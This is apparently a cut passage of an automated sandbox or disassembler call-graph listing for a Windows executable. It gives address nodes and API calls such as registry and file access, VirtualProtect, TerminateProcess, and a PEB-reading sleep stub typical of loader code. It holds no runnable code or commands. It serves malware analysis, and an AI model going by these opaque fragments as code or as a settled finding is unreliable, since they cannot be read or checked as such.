ec4911 93925->93927 93926->93927 93928 ec4925 CloseHandle 93926->93928 93927->93846 93928->93927 93929->93800 93930->93805 93931->93830 93932->93878 93933->93878 93934->93878 93935->93878 93936->93878 93937->93878 93938->93857 93939->93859 93940->93877 93941->93852 93942->93856 93944 ec4818 CreateFileW 93943->93944 93945 f3406e 93943->93945 93946 ec4582 93944->93946 93945->93946 93947 f34074 CreateFileW 93945->93947 93946->93904 93951 ec45d5 93946->93951 93947->93946 93948 f3409a 93947->93948 93949 ec46ce 2 API calls 93948->93949 93950 f340a5 93949->93950 93950->93946 93952 ec45f5 93951->93952 93953 ec46ce 2 API calls 93952->93953 93960 ec464e 93952->93960 93961 ec46a2 93952->93961 93954 ec462d 93953->93954 93955 edf4ea 48 API calls 93954->93955 93956 ec4638 93955->93956 93957 ec47b7 48 API calls 93956->93957 93959 ec4642 93957->93959 93958 ec46ce 2 API calls 93958->93961 93973 ecc2e0 93959->93973 93963 ec4689 93960->93963 93964 ec46ce 2 API calls 93960->93964 93961->93900 93963->93958 93965 f33e0a 93964->93965 93979 ec35fe 93965->93979 93968 edf4ea 48 API calls 93969 f33e19 93968->93969 93970 ecc2e0 2 API calls 93969->93970 93970->93963 93971->93902 93972->93904 93974 ecc354 93973->93974 93978 ecc2ee 93973->93978 93984 ec45a6 SetFilePointerEx 93974->93984 93975 ecc317 93975->93960 93977 ecc327 ReadFile 93977->93975 93977->93978 93978->93975 93978->93977 93980 ec46ce 2 API calls 93979->93980 93981 ec361f 93980->93981 93982 ec46ce 2 API calls 93981->93982 93983 ec3633 93982->93983 93983->93968 93984->93978 93985->93914 93986->93912 93988 ee1e61 93987->93988 93991 ee1e55 93987->93991 94011 ee7c0e 47 API calls __getptd_noexit 93988->94011 93990 ee2019 93993 ee1e41 93990->93993 94012 ee6e10 8 API calls __gmtime64_s 93990->94012 93991->93988 93994 ee1ed4 93991->93994 94006 ee9d6b 47 API calls 2 library calls 93991->94006 93993->93822 93994->93988 94001 ee1f41 93994->94001 94007 ee9d6b 47 API calls 2 library calls 93994->94007 93996 ee1fa0 93996->93988 93996->93993 93997 ee1fb0 93996->93997 94010 ee9d6b 47 API calls 2 library calls 93997->94010 93998 ee1f5f 93998->93988 93999 ee1f7b 93998->93999 94008 ee9d6b 47 API calls 2 library calls 93998->94008 93999->93988 93999->93993 94003 ee1f91 93999->94003 94001->93996 94001->93998 94009 ee9d6b 47 API calls 2 library calls 94003->94009 94006->93994 94007->94001 94008->93999 94009->93993 94010->93993 94011->93990 94012->93993 94014 edf4ea 48 API calls 94013->94014 94015 ec6b54 94014->94015 94015->92809 94016->92811 94018 ec4c8b 94017->94018 94023 ec4d94 94017->94023 94019 edf4ea 48 API calls 94018->94019 94018->94023 94020 ec4cb2 94019->94020 94021 edf4ea 48 API calls 94020->94021 94022 ec4d22 94021->94022 94022->94023 94030 ecb470 94022->94030 94058 ec4dd9 48 API calls 94022->94058 94059 f09af1 48 API calls 94022->94059 94060 ecba85 48 API calls ___crtGetEnvironmentStringsW 94022->94060 94023->92815 94028->92817 94029->92819 94061 ec6b0f 94030->94061 94032 ecb69b 94073 ecba85 48 API calls ___crtGetEnvironmentStringsW 94032->94073 94034 ecb6b5 Mailbox 94034->94022 94037 f3397b 94077 f026bc 88 API calls 4 library calls 94037->94077 94038 f33939 ___crtGetEnvironmentStringsW 94076 f026bc 88 API calls 4 library calls 94038->94076 94039 ecbcce 48 API calls 94041 ecb495 94039->94041 94041->94032 94041->94037 94041->94038 94041->94039 94047 ecba85 48 API calls 94041->94047 94049 ecb9e4 94041->94049 94050 f33909 94041->94050 94055 ecbdfa 48 API calls 94041->94055 94066 ecc413 59 API calls 94041->94066 94067 ecbb85 94041->94067 94072 ecbc74 48 API calls 94041->94072 94074 ecc6a5 49 API calls 94041->94074 94075 ecc799 48 API calls ___crtGetEnvironmentStringsW 94041->94075 94045 f33989 94078 ecba85 48 API calls ___crtGetEnvironmentStringsW 94045->94078 94046 f33973 94046->94034 94047->94041 94079 f026bc 88 API calls 4 library calls 94049->94079 94052 ec6b4a 48 API calls 94050->94052 94053 f33914 94052->94053 94057 edf4ea 48 API calls 94053->94057 94056 ecb66c CharUpperBuffW 94055->94056 94056->94041 94057->94038 94058->94022 94059->94022 94060->94022 94062 edf4ea 48 API calls 94061->94062 94063 ec6b34 94062->94063 94064 ec6b4a 48 API calls 94063->94064 94065 ec6b43 94064->94065 94065->94041 94066->94041 94068 ecbb9b 94067->94068 94071 ecbb96 ___crtGetEnvironmentStringsW 94067->94071 94069 f31b77 94068->94069 94070 edee75 48 API calls 94068->94070 94070->94071 94071->94041 94072->94041 94073->94034 94074->94041 94075->94041 94076->94046 94077->94045 94078->94046 94079->94046 94081 ec403c LoadImageW 94080->94081 94082 f3418d EnumResourceNamesW 94080->94082 94083 ec3ee1 RegisterClassExW 94081->94083 94082->94083 94084 ec3f53 7 API calls 94083->94084 94084->92834 94086 f33c33 94085->94086 94087 ec4c44 94085->94087 94086->94087 94088 f33c3c DestroyIcon 94086->94088 94087->92840 94111 f05819 61 API calls _W_store_winword 94087->94111 94088->94087 94090 ec51cb 94089->94090 94091 ec52a2 Mailbox 94089->94091 94092 ec6b0f 48 API calls 94090->94092 94091->92845 94093 ec51d9 94092->94093 94094 f33ca1 LoadStringW 94093->94094 94095 ec51e6 94093->94095 94098 f33cbb 94094->94098 94096 ec6a63 48 API calls 94095->94096 94097 ec51fb 94096->94097 94097->94098 94111->92840 94115 ecf130 94114->94115 94118 ecfe30 335 API calls 94115->94118 94121 ecf199 94115->94121 94116 ecf3dd 94119 f387c8 94116->94119 94132 ecf3f2 94116->94132 94164 ecf431 Mailbox 94116->94164 94117 ecf595 94125 ecd7f7 48 API calls 94117->94125 94117->94164 94120 f38728 94118->94120 94245 f0cc5c 86 API calls 4 library calls 94119->94245 94120->94121 94242 f0cc5c 86 API calls 4 library calls 94120->94242 94121->94116 94121->94117 94127 ecd7f7 48 API calls 94121->94127 94160 ecf229 94121->94160 94122 ecfe30 335 API calls 94122->94164 94126 f387a3 94125->94126 94244 ee0f0a 52 API calls __cinit 94126->94244 94129 f38772 94127->94129 94128 f38b1b 94143 f38bcf 94128->94143 94144 f38b2c 94128->94144 94243 ee0f0a 52 API calls __cinit 94129->94243 94130 f0cc5c 86 API calls 94130->94164 94155 ecf418 94132->94155 94246 f09af1 48 API calls 94132->94246 94133 ecf770 94139 f38a45 94133->94139 94156 ecf77a 94133->94156 94135 ecd6e9 55 API calls 94135->94164 94137 ecfe30 335 API calls 94158 ecf6aa 94137->94158 94138 f38b7e 94255 f1e40a 335 API calls Mailbox 94138->94255 94252 edc1af 48 API calls 94139->94252 94140 f38c53 94260 f0cc5c 86 API calls 4 library calls 94140->94260 94141 f38810 94247 f1eef8 335 API calls 94141->94247 94257 f0cc5c 86 API calls 4 library calls 94143->94257 94254 f1f5ee 335 API calls 94144->94254 94145 f38beb 94258 f1bdbd 335 API calls Mailbox 94145->94258 94151 ed1b90 48 API calls 94151->94164 94153 ed1b90 48 API calls 94153->94164 94155->94128 94155->94158 94155->94164 94156->94153 94157 f38c00 94178 ecf537 Mailbox 94157->94178 94259 f0cc5c 86 API calls 4 library calls 94157->94259 94158->94133 94158->94137 94159 ecfce0 94158->94159 94158->94164 94158->94178 94159->94178 94256 f0cc5c 86 API calls 4 library calls 94159->94256 94160->94116 94160->94117 94160->94155 94160->94164 94161 f38823 94161->94155 94163 f3884b 94161->94163 94164->94122 94164->94130 94164->94135 94164->94138 94164->94140 94164->94145 94164->94151 94164->94159 94164->94178 94241 ecdd47 48 API calls ___crtGetEnvironmentStringsW 94164->94241 94253 ef97ed InterlockedDecrement 94164->94253 94261 edc1af 48 API calls 94164->94261 94178->92906 94180 ed479f 94179->94180 94181 ed4637 94179->94181 94184 ecce19 48 API calls 94180->94184 94182 f36e05 94181->94182 94183 ed4643 94181->94183 94316 f1e822 94182->94316 94315 ed4300 335 API calls ___crtGetEnvironmentStringsW 94183->94315 94191 ed46e4 Mailbox 94184->94191 94187 ed4739 Mailbox 94187->92906 94188 f36e11 94188->94187 94356 f0cc5c 86 API calls 4 library calls 94188->94356 94190 ed4659 94190->94187 94190->94188 94190->94191 94195 ec4252 84 API calls 94191->94195 94262 f06524 94191->94262 94265 f16ff0 94191->94265 94274 f0fa0c 94191->94274 94195->94187 94196->92906 94197->92906 94198->92906 94199->92906 94200->92906 94201->92858 94202->92852 94203->92857 94204->92906 94205->92906 94206->92898 94207->92898 94208->92898 94210 ecfe50 94209->94210 94215 ecfe7e 94209->94215 94211 edf4ea 48 API calls 94210->94211 94211->94215 94212 ed146e 94213 ec6eed 48 API calls 94212->94213 94219 ecffe1 94213->94219 94214 ecd7f7 48 API calls 94214->94215 94215->94212 94215->94214 94217 ed0509 94215->94217 94215->94219 94221 edf4ea 48 API calls 94215->94221 94222 ed1473 94215->94222 94224 f3a246 94215->94224 94228 ec6eed 48 API calls 94215->94228 94229 ef97ed InterlockedDecrement 94215->94229 94231 f3a30e 94215->94231 94232 ee0f0a 52 API calls __cinit 94215->94232 94234 f3a973 94215->94234 94237 ed15b5 94215->94237 94481 ed1820 335 API calls 2 library calls 94215->94481 94482 ed1d10 59 API calls Mailbox 94215->94482 94486 f0cc5c 86 API calls 4 library calls 94217->94486 94219->92906 94221->94215 94485 f0cc5c 86 API calls 4 library calls 94222->94485 94223 f3a922 94223->92906 94226 ec6eed 48 API calls 94224->94226 94226->94219 94228->94215 94229->94215 94230 f3a873 94230->92906 94231->94219 94483 ef97ed InterlockedDecrement 94231->94483 94232->94215 94487 f0cc5c 86 API calls 4 library calls 94234->94487 94236 f3a982 94484 f0cc5c 86 API calls 4 library calls 94237->94484 94238->92898 94239->92898 94240->92898 94241->94164 94242->94121 94243->94160 94244->94164 94245->94178 94246->94141 94247->94161 94252->94164 94253->94164 94254->94164 94255->94159 94256->94178 94257->94178 94258->94157 94259->94178 94260->94178 94261->94164 94357 f06ca9 GetFileAttributesW 94262->94357 94361 ec936c 94265->94361 94267 f1702a 94268 ecb470 91 API calls 94267->94268 94275 f0fa1c __ftell_nolock 94274->94275 94276 f0fa44 94275->94276 94464 ecd286 48 API calls 94275->94464 94278 ec936c 81 API calls 94276->94278 94279 f0fa5e 94278->94279 94280 f0fa80 94279->94280 94281 f0fb68 94279->94281 94290 f0fb92 94279->94290 94290->94187 94315->94190 94317 f1e868 94316->94317 94318 f1e84e 94316->94318 94472 f1ccdc 48 API calls 94317->94472 94471 f0cc5c 86 API calls 4 library calls 94318->94471 94321 f1e871 94322 ecfe30 334 API calls 94321->94322 94323 f1e8cf 94322->94323 94355 f1e860 Mailbox 94323->94355 94355->94188 94356->94187 94358 f06529 94357->94358 94359 f06cc4 FindFirstFileW 94357->94359 94358->94187 94359->94358 94360 f06cd9 FindClose 94359->94360 94360->94358 94362 ec9384 94361->94362 94379 ec9380 94361->94379 94363 ec9398 94362->94363 94364 f34bbf 94362->94364 94367 f34cbd __i64tow 94362->94367 94375 ec93b0 __itow Mailbox _wcscpy 94362->94375 94395 ee172b 80 API calls 4 library calls 94363->94395 94365 f34ca5 94364->94365 94369 f34bc8 94364->94369 94367->94367 94372 f34be7 94369->94372 94369->94375 94370 edf4ea 48 API calls 94371 ec93ba 94370->94371 94371->94379 94375->94370 94379->94267 94395->94375 94464->94276 94471->94355 94472->94321 94481->94215 94482->94215 94483->94219 94484->94219 94485->94230 94486->94223 94487->94236 94498 116dbe0 94512 116b830 94498->94512 94500 116dcb3 94515 116dad0 94500->94515 94518 116ece0 GetPEB 94512->94518 94514 116bebb 94514->94500 94516 116dad9 Sleep 94515->94516 94517 116dae7 94516->94517 94519 116ed0a 94518->94519 94519->94514 94520 f319cb 94525 ec2322 94520->94525 94522 f319d1 94558 ee0f0a 52 API calls __cinit 94522->94558 94524 f319db 94526 ec2344 94525->94526 94559 ec26df 94526->94559 94531 ecd7f7 48 API calls 94532 ec2384 94531->94532 94533 ecd7f7 48 API calls 94532->94533 94534 ec238e 94533->94534 94535 ecd7f7 48 API calls 94534->94535 94536 ec2398 94535->94536 94537 ecd7f7 48 API calls 94536->94537 94538 ec23de 94537->94538 94539 ecd7f7 48 API calls 94538->94539 94540 ec24c1 94539->94540 94567 ec263f 94540->94567 94544 ec24f1 94545 ecd7f7 48 API calls 94544->94545 94546 ec24fb 94545->94546 94596 ec2745 94546->94596 94548 ec2546 94549 ec2556 GetStdHandle 94548->94549 94550 ec25b1 94549->94550 94551 f3501d 94549->94551 94552 ec25b7 CoInitialize 94550->94552 94551->94550 94553 f35026 94551->94553 94552->94522 94603 f092d4 53 API calls 94553->94603 94555 f3502d 94604 f099f9 CreateThread 94555->94604 94557 f35039 CloseHandle 94557->94552 94558->94524 94605 ec2854 94559->94605 94562 ec6a63 48 API calls 94563 ec234a 94562->94563 94564 ec272e 94563->94564 94619 ec27ec 6 API calls 94564->94619 94566 ec237a 94566->94531 94568 ecd7f7 48 API calls 94567->94568 94569 ec264f 94568->94569 94570 ecd7f7 48 API calls 94569->94570 94571 ec2657 94570->94571 94620 ec26a7 94571->94620 94574 ec26a7 48 API calls 94575 ec2667 94574->94575 94576 ecd7f7 48 API calls 94575->94576 94577 ec2672 94576->94577 94578 edf4ea 48 API calls 94577->94578 94579 ec24cb 94578->94579 94580 ec22a4 94579->94580 94581 ec22b2 94580->94581 94582 ecd7f7 48 API calls 94581->94582 94583 ec22bd 94582->94583 94584 ecd7f7 48 API calls 94583->94584 94585 ec22c8 94584->94585 94586 ecd7f7 48 API calls 94585->94586 94587 ec22d3 94586->94587 94588 ecd7f7 48 API calls 94587->94588 94589 ec22de 94588->94589 94590 ec26a7 48 API calls 94589->94590 94591 ec22e9 94590->94591 94592 edf4ea 48 API calls 94591->94592 94593 ec22f0 94592->94593 94594 f31fe7 94593->94594 94595 ec22f9 RegisterWindowMessageW 94593->94595 94595->94544 94597 ec2755 94596->94597 94598 f35f4d 94596->94598 94600 edf4ea 48 API calls 94597->94600 94625 f0c942 50 API calls 94598->94625 94602 ec275d 94600->94602 94601 f35f58 94602->94548 94603->94555 94604->94557 94626 f099df 54 API calls 94604->94626 94612 ec2870 94605->94612 94608 ec2870 48 API calls 94609 ec2864 94608->94609 94610 ecd7f7 48 API calls 94609->94610 94611 ec2716 94610->94611 94611->94562 94613 ecd7f7 48 API calls 94612->94613 94614 ec287b 94613->94614 94615 ecd7f7 48 API calls 94614->94615 94616 ec2883 94615->94616 94617 ecd7f7 48 API calls 94616->94617 94618 ec285c 94617->94618 94618->94608 94619->94566 94621 ecd7f7 48 API calls 94620->94621 94622 ec26b0 94621->94622 94623 ecd7f7 48 API calls 94622->94623 94624 ec265f 94623->94624 94624->94574 94625->94601 94627 f3197b 94632 eddd94 94627->94632 94631 f3198a 94633 edf4ea 48 API calls 94632->94633 94635 eddd9c 94633->94635 94634 edddb0 94639 ee0f0a 52 API calls __cinit 94634->94639 94635->94634 94640 eddf3d 94635->94640 94639->94631 94641 eddda8 94640->94641 94642 eddf46 94640->94642 94644 edddc0 94641->94644 94672 ee0f0a 52 API calls __cinit 94642->94672 94645 ecd7f7 48 API calls 94644->94645 94646 edddd7 GetVersionExW 94645->94646 94647 ec6a63 48 API calls 94646->94647 94648 edde1a 94647->94648 94673 eddfb4 94648->94673 94651 ec6571 48 API calls 94660 edde2e 94651->94660 94654 f324c8 94655 eddea4 GetCurrentProcess 94686 eddf5f LoadLibraryA GetProcAddress 94655->94686 94656 eddebb 94658 eddf31 GetSystemInfo 94656->94658 94659 eddee3 94656->94659 94661 eddf0e 94658->94661 94680 ede00c 94659->94680 94660->94654 94677 eddf77 94660->94677 94663 eddf1c FreeLibrary 94661->94663 94664 eddf21 94661->94664 94663->94664 94664->94634 94666 eddf29 GetSystemInfo 94668 eddf03 94666->94668 94667 eddef9 94683 eddff4 94667->94683 94668->94661 94671 eddf09 FreeLibrary 94668->94671 94671->94661 94672->94641 94674 eddfbd 94673->94674 94675 ecb18b 48 API calls 94674->94675 94676 edde22 94675->94676 94676->94651 94687 eddf89 94677->94687 94691 ede01e 94680->94691 94684 ede00c 2 API calls 94683->94684 94685 eddf01 GetNativeSystemInfo 94684->94685 94685->94668 94686->94656 94688 eddea0 94687->94688 94689 eddf92 LoadLibraryA 94687->94689 94688->94655 94688->94656 94689->94688 94690 eddfa3 GetProcAddress 94689->94690 94690->94688 94692 eddef1 94691->94692 94693 ede027 LoadLibraryA 94691->94693 94692->94666 94692->94667 94693->94692 94694 ede038 GetProcAddress 94693->94694 94694->94692 94695 f319ba 94700 edc75a 94695->94700 94699 f319c9 94701 ecd7f7 48 API calls 94700->94701 94702 edc7c8 94701->94702 94708 edd26c 94702->94708 94705 edc865 94706 edc881 94705->94706 94711 edd1fa 48 API calls ___crtGetEnvironmentStringsW 94705->94711 94707 ee0f0a 52 API calls __cinit 94706->94707 94707->94699 94712 edd298 94708->94712 94711->94705 94713 edd28b 94712->94713 94714 edd2a5 94712->94714 94713->94705 94714->94713 94715 edd2ac RegOpenKeyExW 94714->94715 94715->94713 94716 edd2c6 RegQueryValueExW 94715->94716 94717 edd2fc RegCloseKey 94716->94717 94718 edd2e7 94716->94718 94717->94713 94718->94717 94719 f319dd 94724 ec4a30 94719->94724 94721 f319f1 94744 ee0f0a 52 API calls __cinit 94721->94744 94723 f319fb 94725 ec4a40 __ftell_nolock 94724->94725 94726 ecd7f7 48 API calls 94725->94726 94727 ec4af6 94726->94727 94728 ec5374 50 API calls 94727->94728 94729 ec4aff 94728->94729 94745 ec363c 94729->94745 94732 ec518c 48 API calls 94733 ec4b18 94732->94733 94734 ec64cf 48 API calls 94733->94734 94735 ec4b29 94734->94735 94736 ecd7f7 48 API calls 94735->94736 94737 ec4b32 94736->94737 94751 ec49fb 94737->94751 94739 ec61a6 48 API calls 94743 ec4b3d _wcscat Mailbox __NMSG_WRITE 94739->94743 94740 ec4b43 Mailbox 94740->94721 94741 ecce19 48 API calls 94741->94743 94742 ec64cf 48 API calls 94742->94743 94743->94739 94743->94740 94743->94741 94743->94742 94744->94723 94746 ec3649 __ftell_nolock 94745->94746 94765 ec366c GetFullPathNameW 94746->94765 94748 ec365a 94749 ec6a63 48 API calls 94748->94749 94750 ec3669 94749->94750 94750->94732 94752 ecbcce 48 API calls 94751->94752 94753 ec4a0a RegOpenKeyExW 94752->94753 94754 ec4a2b 94753->94754 94755 f341cc RegQueryValueExW 94753->94755 94754->94743 94756 f34246 RegCloseKey 94755->94756 94757 f341e5 94755->94757 94758 edf4ea 48 API calls 94757->94758 94759 f341fe 94758->94759 94760 ec47b7 48 API calls 94759->94760 94761 f34208 RegQueryValueExW 94760->94761 94762 f34224 94761->94762 94764 f3423b 94761->94764 94763 ec6a63 48 API calls 94762->94763 94763->94764 94764->94756 94766 ec368a 94765->94766 94766->94748 94767 ec3742 94768 ec374b 94767->94768 94769 ec37c8 94768->94769 94770 ec3769 94768->94770 94808 ec37c6 94768->94808 94771 ec37ce 94769->94771 94772 f31e00 94769->94772 94773 ec382c PostQuitMessage 94770->94773 94774 ec3776 94770->94774 94776 ec37f6 SetTimer RegisterWindowMessageW 94771->94776 94777 ec37d3 94771->94777 94816 ec2ff6 16 API calls 94772->94816 94781 ec37b9 94773->94781 94779 f31e88 94774->94779 94780 ec3781 94774->94780 94775 ec37ab DefWindowProcW 94775->94781 94776->94781 94785 ec381f CreatePopupMenu 94776->94785 94782 f31da3 94777->94782 94783 ec37da KillTimer 94777->94783 94821 f04ddd 60 API calls _memset 94779->94821 94786 ec3789 94780->94786 94787 ec3836 94780->94787 94795 f31da8 94782->94795 94796 f31ddc MoveWindow 94782->94796 94812 ec3847 Shell_NotifyIconW _memset 94783->94812 94784 f31e27 94817 ede312 335 API calls Mailbox 94784->94817 94785->94781 94791 ec3794 94786->94791 94792 f31e6d 94786->94792 94814 edeb83 53 API calls _memset 94787->94814 94798 ec379f 94791->94798 94799 f31e58 94791->94799 94792->94775 94820 efa5f3 48 API calls 94792->94820 94793 f31e9a 94793->94775 94793->94781 94801 f31dcb SetFocus 94795->94801 94802 f31dac 94795->94802 94796->94781 94797 ec37ed 94813 ec390f DeleteObject DestroyWindow Mailbox 94797->94813 94798->94775 94818 ec3847 Shell_NotifyIconW _memset 94798->94818 94819 f055bd 70 API calls _memset 94799->94819 94800 ec3845 94800->94781 94801->94781 94802->94798 94803 f31db5 94802->94803 94815 ec2ff6 16 API calls 94803->94815 94808->94775 94810 f31e4c 94811 ec4ffc 67 API calls 94810->94811 94811->94808 94812->94797 94813->94781 94814->94800 94815->94781 94816->94784 94817->94798 94818->94810 94819->94800 94820->94808 94821->94793 94822 f39bec 94859 ed0ae0 Mailbox ___crtGetEnvironmentStringsW 94822->94859 94826 edf4ea 48 API calls 94849 ecfec8 94826->94849 94827 ed146e 94837 ec6eed 48 API calls 94827->94837 94830 ed0509 94997 f0cc5c 86 API calls 4 library calls 94830->94997 94831 ec6eed 48 API calls 94831->94849 94833 ed1473 94996 f0cc5c 86 API calls 4 library calls 94833->94996 94834 f3a922 94835 f3a246 94840 ec6eed 48 API calls 94835->94840 94851 ecffe1 Mailbox 94837->94851 94840->94851 94841 ef97ed InterlockedDecrement 94841->94849 94842 f3a873 94843 f3a30e 94843->94851 94992 ef97ed InterlockedDecrement 94843->94992 94844 ecd7f7 48 API calls 94844->94849 94845 ecce19 48 API calls 94845->94859 94846 ee0f0a 52 API calls __cinit 94846->94849 94848 f3a973 94998 f0cc5c 86 API calls 4 library calls 94848->94998 94849->94826 94849->94827 94849->94830 94849->94831 94849->94833 94849->94835 94849->94841 94849->94843 94849->94844 94849->94846 94849->94848 94849->94851 94853 ed15b5 94849->94853 94989 ed1820 335 API calls 2 library calls 94849->94989 94990 ed1d10 59 API calls Mailbox 94849->94990 94852 f3a982 94995 f0cc5c 86 API calls 4 library calls 94853->94995 94854 f1e822 335 API calls 94854->94859 94855 ecfe30 335 API calls 94855->94859 94856 f3a706 94993 f0cc5c 86 API calls 4 library calls 94856->94993 94858 ed1526 Mailbox 94994 f0cc5c 86 API calls 4 library calls 94858->94994 94859->94845 94859->94849 94859->94851 94859->94854 94859->94855 94859->94856 94859->94858 94860 edf4ea 48 API calls 94859->94860 94861 ef97ed InterlockedDecrement 94859->94861 94866 f20d09 94859->94866 94869 ec2db5 94859->94869 94909 ec2a13 94859->94909 94912 f0fe7e 94859->94912 94951 f1f0ac 94859->94951 94983 f0a6ef 94859->94983 94991 f1ef61 82 API calls 2 library calls 94859->94991 94860->94859 94861->94859 94999 f1f8ae 94866->94999 94868 f20d19 94868->94859 94870 eccdb9 48 API calls 94869->94870 94871 ec2dcd 94870->94871 94872 edf4ea 48 API calls 94871->94872 94875 f35f6d 94871->94875 94874 ec2ded 94872->94874 94876 ec2dfd 94874->94876 95108 ec48ba 49 API calls 94874->95108 94887 ec2e22 94875->94887 95112 f12113 48 API calls 94875->95112 94878 ec936c 81 API calls 94876->94878 94880 ec2e0b 94878->94880 94882 ec4550 56 API calls 94880->94882 94881 f35fb9 94883 f35fc1 94881->94883 94884 ec2e31 94881->94884 94885 ec2e1a 94882->94885 95114 ecd286 48 API calls 94883->95114 94888 ec2a13 2 API calls 94884->94888 94885->94875 94885->94887 95111 ec453b CloseHandle 94885->95111 94887->94884 95113 ecd286 48 API calls 94887->95113 94889 ec2e38 94888->94889 94890 f35fd4 94889->94890 94891 ec2e45 94889->94891 94894 edf4ea 48 API calls 94890->94894 94893 ecd7f7 48 API calls 94891->94893 94895 ec2e4d 94893->94895 94896 f35fda 94894->94896 95085 ede52c 94895->95085 94898 f35ff3 94896->94898 95115 edeb66 SetFilePointerEx ReadFile 94896->95115 94903 f35ff7 ___crtGetEnvironmentStringsW 94898->94903 95116 f0a3e3 48 API calls _memset 94898->95116 94900 ec2e5c 94900->94903 95109 ec6b68 48 API calls 94900->95109 94904 ec2e70 Mailbox 94905 ec2eb0 94904->94905 94906 ec4907 CloseHandle 94904->94906 94905->94859 94907 ec2ea2 94906->94907 95110 ec453b CloseHandle 94907->95110 94910 ec35fe 2 API calls 94909->94910 94911 ec2a1b 94910->94911 94911->94859 94913 f0fea7 94912->94913 94914 f0fe9c 94912->94914 94916 f0ff3a Mailbox 94913->94916 94919 ec936c 81 API calls 94913->94919 95173 ecd286 48 API calls 94914->95173 94917 edf4ea 48 API calls 94916->94917 94950 f0ff43 Mailbox 94916->94950 94918 f0ff5f 94917->94918 94920 f0ff6b 94918->94920 95177 ec48ba 49 API calls 94918->95177 94921 f0feca 94919->94921 94924 ec936c 81 API calls 94920->94924 94923 ee1dfc __wsplitpath 47 API calls 94921->94923 94925 f0fee2 94923->94925 94926 f0ff83 94924->94926 94927 ecce19 48 API calls 94925->94927 94928 ec4550 56 API calls 94926->94928 94929 f0fef3 94927->94929 94930 f0ff92 94928->94930 94931 ec518c 48 API calls 94929->94931 94932 f0ff96 GetLastError 94930->94932 94933 f0ffca 94930->94933 94934 f0ff01 94931->94934 94943 f0ffaf 94932->94943 94937 f10011 94933->94937 94938 f0fff5 94933->94938 94935 f0ff33 94934->94935 95174 f06514 GetFileAttributesW FindFirstFileW FindClose 94934->95174 95176 ecd286 48 API calls 94935->95176 94942 edf4ea 48 API calls 94937->94942 94941 edf4ea 48 API calls 94938->94941 94940 f0ff11 94940->94935 94945 f0ff15 94940->94945 94946 f0fffa 94941->94946 94942->94950 94943->94950 95178 ec453b CloseHandle 94943->95178 95175 f06318 52 API calls 3 library calls 94945->95175 95179 f229e8 48 API calls ___crtGetEnvironmentStringsW 94946->95179 94949 f0ff1e 94949->94935 94950->94859 94952 ecd7f7 48 API calls 94951->94952 94953 f1f0c0 94952->94953 94954 ecd7f7 48 API calls 94953->94954 94955 f1f0c8 94954->94955 94956 ecd7f7 48 API calls 94955->94956 94957 f1f0d0 94956->94957 94958 ec936c 81 API calls 94957->94958 94982 f1f0de 94958->94982 94959 ec6a63 48 API calls 94959->94982 94960 f1f2cc 94961 f1f2f9 Mailbox 94960->94961 95183 ec6b68 48 API calls 94960->95183 94961->94859 94962 f1f2b3 94967 ec518c 48 API calls 94962->94967 94964 ecc799 48 API calls 94964->94982 94965 f1f2ce 94968 ec518c 48 API calls 94965->94968 94966 ec6eed 48 API calls 94966->94982 94969 f1f2c0 94967->94969 94971 f1f2dd 94968->94971 95181 ec510d 48 API calls Mailbox 94969->95181 95182 ec510d 48 API calls Mailbox 94971->95182 94972 ecbdfa 48 API calls 94975 f1f175 CharUpperBuffW 94972->94975 94974 ecbdfa 48 API calls 94976 f1f23a CharUpperBuffW 94974->94976 94977 ecd645 53 API calls 94975->94977 95180 edd922 55 API calls 2 library calls 94976->95180 94977->94982 94979 ec518c 48 API calls 94979->94982 94980 ec936c 81 API calls 94980->94982 94981 ec510d 48 API calls 94981->94982 94982->94959 94982->94960 94982->94961 94982->94962 94982->94964 94982->94965 94982->94966 94982->94972 94982->94974 94982->94979 94982->94980 94982->94981 94984 f0a6fb 94983->94984 94985 edf4ea 48 API calls 94984->94985 94986 f0a709 94985->94986 94987 f0a717 94986->94987 94988 ecd7f7 48 API calls 94986->94988 94987->94859 94988->94987 94989->94849 94990->94849 94991->94859 94992->94851 94993->94858 94994->94851 94995->94851 94996->94842 94997->94834 94998->94852 95000 ec936c 81 API calls 94999->95000 95001 f1f8ea 95000->95001 95003 f1f92c Mailbox 95001->95003 95035 f20567 95001->95035 95003->94868 95004 f1fb8b 95005 f1fcfa 95004->95005 95007 f1fb95 95004->95007 95071 f20688 89 API calls Mailbox 95005->95071 95048 f1f70a 95007->95048 95009 f1fd07 95009->95007 95010 f1fd13 95009->95010 95010->95003 95011 ec936c 81 API calls 95028 f1f984 Mailbox 95011->95028 95016 f1fbc9 95062 eded18 95016->95062 95019 f1fbe3 95068 f0cc5c 86 API calls 4 library calls 95019->95068 95020 f1fbfd 95022 edc050 48 API calls 95020->95022 95024 f1fc14 95022->95024 95023 f1fbee GetCurrentProcess TerminateProcess 95023->95020 95025 ed1b90 48 API calls 95024->95025 95034 f1fc3e 95024->95034 95027 f1fc2d 95025->95027 95026 f1fd65 95026->95003 95031 f1fd7e FreeLibrary 95026->95031 95069 f2040f 105 API calls _free 95027->95069 95028->95003 95028->95004 95028->95011 95028->95028 95066 f229e8 48 API calls ___crtGetEnvironmentStringsW 95028->95066 95067 f1fda5 60 API calls 2 library calls 95028->95067 95030 ed1b90 48 API calls 95030->95034 95031->95003 95034->95026 95034->95030 95070 ecdcae 50 API calls Mailbox 95034->95070 95072 f2040f 105 API calls _free 95034->95072 95036 ecbdfa 48 API calls 95035->95036 95037 f20582 CharLowerBuffW 95036->95037 95073 f01f11 95037->95073 95041 ecd7f7 48 API calls 95042 f205bb 95041->95042 95080 ec69e9 48 API calls ___crtGetEnvironmentStringsW 95042->95080 95044 f205d2 95046 ecb18b 48 API calls 95044->95046 95045 f2061a Mailbox 95045->95028 95047 f205de Mailbox 95046->95047 95047->95045 95081 f1fda5 60 API calls 2 library calls 95047->95081 95049 f1f725 95048->95049 95053 f1f77a 95048->95053 95050 edf4ea 48 API calls 95049->95050 95051 f1f747 95050->95051 95052 edf4ea 48 API calls 95051->95052 95051->95053 95052->95051 95054 f20828 95053->95054 95055 f20a53 Mailbox 95054->95055 95061 f2084b _strcat _wcscpy __NMSG_WRITE 95054->95061 95055->95016 95056 eccf93 58 API calls 95056->95061 95057 ecd286 48 API calls 95057->95061 95058 ec936c 81 API calls 95058->95061 95059 ee395c 47 API calls _W_store_winword 95059->95061 95061->95055 95061->95056 95061->95057 95061->95058 95061->95059 95084 f08035 50 API calls __NMSG_WRITE 95061->95084 95063 eded2d 95062->95063 95064 ededc5 VirtualProtect 95063->95064 95065 eded93 95063->95065 95064->95065 95065->95019 95065->95020 95066->95028 95067->95028 95068->95023 95069->95034 